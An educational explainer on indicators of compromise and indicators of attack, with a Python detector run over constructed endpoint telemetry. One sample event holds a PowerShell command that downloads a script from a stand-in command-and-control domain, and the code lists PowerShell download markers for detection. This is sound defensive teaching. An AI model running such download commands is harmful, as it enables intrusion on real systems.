Indicator of Compromise (IOC)

IOCs are data artifacts left behind during or after a cyberattack. These indicators provide signs—sometimes obvious, often subtle—that malicious activity has occurred. Think of them as fingerprints at a crime scene. They help cybersecurity professionals detect breaches, trace the attacker’s actions, and understand the nature and scope of an incident. Unlike preventive defenses such as firewalls or anti-virus signatures, IOCs are reactive but essential—they confirm that an attack has happened or is in progress.

Types of IOCs

IOCs come in many forms and serve different purposes based on the layer of the attack they reveal. File-based IOCs include data like hash values of malware (such as MD5 or SHA-256), filenames, or file locations typically used by attackers. These indicators help identify whether known malware is present on a system.

Network-based IOCs focus on communication patterns and include elements such as suspicious IP addresses, command-and-control domains, and traffic over unusual ports. These can indicate external communication with attacker infrastructure.

Host-based IOCs relate to changes made within the system environment, such as unauthorized registry edits, strange process behavior, or the appearance of services not normally running. These are often the most immediate signs of intrusion on an endpoint.

Finally, behavioral IOCs capture anomalies in user or system behavior. Examples include employees accessing confidential data they normally don’t use, login attempts from geographically improbable locations, or system access during off-hours. These patterns can help detect threats even when attackers use previously unseen malware or tools.


IOCs vs. IOAs

It’s important to distinguish IOCs from Indicators of Attack (IOAs). While IOCs represent the signs that an attack has occurred—such as a known malware file or command-and-control (C2) IP—IOAs reveal the attacker’s intent and tactics. IOAs focus on behavior rather than artifacts. For instance, a user launching PowerShell to download an unknown script could be flagged as an IOA, even if that script is new and has no associated hash yet. Both IOCs and IOAs are crucial, but IOAs are particularly effective at identifying novel or zero-day attacks that haven’t been seen before.
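The following is an added example, not code from the PentestPad page, that ties together the four IOC types described above (file, network, host, behavioral) and the IOC-versus-IOA distinction in this section. It runs two small matchers over a constructed stream of endpoint events: `match_iocs` looks for known artifacts (a SHA-256, an IP, a domain, a registry Run value, an off-hours login), while `match_ioas` looks at what a process is doing (PowerShell fetching a remote script) and fires even though the downloaded script's hash appears nowhere in the indicator set. All indicator values, event fields and the business-hours window are assumptions made for the example; the IPs and domains come from documentation ranges and the "bad" hash is derived from a constructed byte string rather than any real sample.

```python
import hashlib
from datetime import datetime
from typing import Dict, List, Tuple

# --- Constructed indicator sets (placeholders, not real threat intelligence) ---
# File-based IOC: hash of a constructed byte string stands in for a real malware hash.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"constructed malware sample").hexdigest()}
# Network-based IOCs: documentation IP range and an example domain.
KNOWN_BAD_IPS = {"203.0.113.45"}
KNOWN_BAD_DOMAINS = {"c2.example.net"}
# Host-based IOC: a constructed Run-key value name used for persistence in the example.
PERSISTENCE_VALUE = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater_svc"
KNOWN_BAD_REG_VALUES = {PERSISTENCE_VALUE}
# Behavioral IOC: interactive logins outside an assumed 06:00-22:00 business window.
BUSINESS_HOURS = range(6, 22)
# IOA: command-line fragments that indicate PowerShell retrieving remote content.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest")

Event = Dict[str, str]
Hit = Tuple[str, str, str]  # (category, indicator or description, event id)


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def match_iocs(event: Event) -> List[Hit]:
    """Artifact matching: does the event contain something already known to be bad?"""
    hits: List[Hit] = []
    eid, kind = event["id"], event["kind"]
    if kind == "file" and event["sha256"] in KNOWN_BAD_SHA256:
        hits.append(("file", event["sha256"], eid))
    elif kind == "netconn":
        if event["dst_ip"] in KNOWN_BAD_IPS:
            hits.append(("network", event["dst_ip"], eid))
        if event.get("domain") in KNOWN_BAD_DOMAINS:
            hits.append(("network", event["domain"], eid))
    elif kind == "registry" and event["key"] in KNOWN_BAD_REG_VALUES:
        hits.append(("host", event["key"], eid))
    elif kind == "login":
        hour = datetime.fromisoformat(event["time"]).hour
        if hour not in BUSINESS_HOURS:
            hits.append(("behavioral", f"off-hours login by {event['user']}", eid))
    return hits


def match_ioas(event: Event) -> List[Hit]:
    """Behavior matching: what is the process doing, independent of any hash?"""
    hits: List[Hit] = []
    if event["kind"] == "process":
        cmd = event["cmdline"].lower()
        if "powershell" in cmd and any(m in cmd for m in DOWNLOAD_MARKERS):
            hits.append(("ioa", "powershell downloading a remote script", event["id"]))
    return hits


# Constructed telemetry in the order an endpoint agent might emit it.
SAMPLE_EVENTS: List[Event] = [
    {"id": "e1", "kind": "file", "path": r"C:\Users\alice\AppData\Local\Temp\x.exe",
     "sha256": sha256_of(b"constructed malware sample")},
    {"id": "e2", "kind": "process", "user": "alice",
     "cmdline": 'powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri '
                'https://c2.example.net/a.ps1 -OutFile $env:TEMP\\a.ps1"'},
    {"id": "e3", "kind": "netconn", "dst_ip": "203.0.113.45", "dst_port": "8443",
     "domain": "c2.example.net"},
    {"id": "e4", "kind": "registry", "key": PERSISTENCE_VALUE},
    {"id": "e5", "kind": "login", "user": "alice", "time": "2024-03-02T03:14:00"},
    {"id": "e6", "kind": "file", "path": r"C:\Windows\System32\notepad.exe",
     "sha256": sha256_of(b"benign binary")},
    {"id": "e7", "kind": "process", "user": "bob", "cmdline": "powershell.exe -Command Get-Process"},
    # The script fetched in e2: never seen before, so it has no IOC hash on record.
    {"id": "e8", "kind": "file", "path": r"C:\Users\alice\AppData\Local\Temp\a.ps1",
     "sha256": sha256_of(b"never-before-seen script")},
]


def scan(events: List[Event]) -> Tuple[List[Hit], List[Hit]]:
    """Run both matchers over an event stream and return (IOC hits, IOA hits)."""
    ioc_hits: List[Hit] = []
    ioa_hits: List[Hit] = []
    for ev in events:
        ioc_hits.extend(match_iocs(ev))
        ioa_hits.extend(match_ioas(ev))
    return ioc_hits, ioa_hits


if __name__ == "__main__":
    iocs, ioas = scan(SAMPLE_EVENTS)
    for category, detail, eid in iocs:
        print(f"IOC [{category:<10}] {eid}: {detail}")
    for category, detail, eid in ioas:
        print(f"IOA [{category:<10}] {eid}: {detail}")
```

Event e8 is the point of the contrast: its hash is unknown, so `match_iocs` stays silent, but the behavior that produced it (e2) was already caught by `match_ioas`. In a real deployment the indicator sets would be loaded from a threat-intelligence feed and the behavioral thresholds tuned per environment rather than hard-coded.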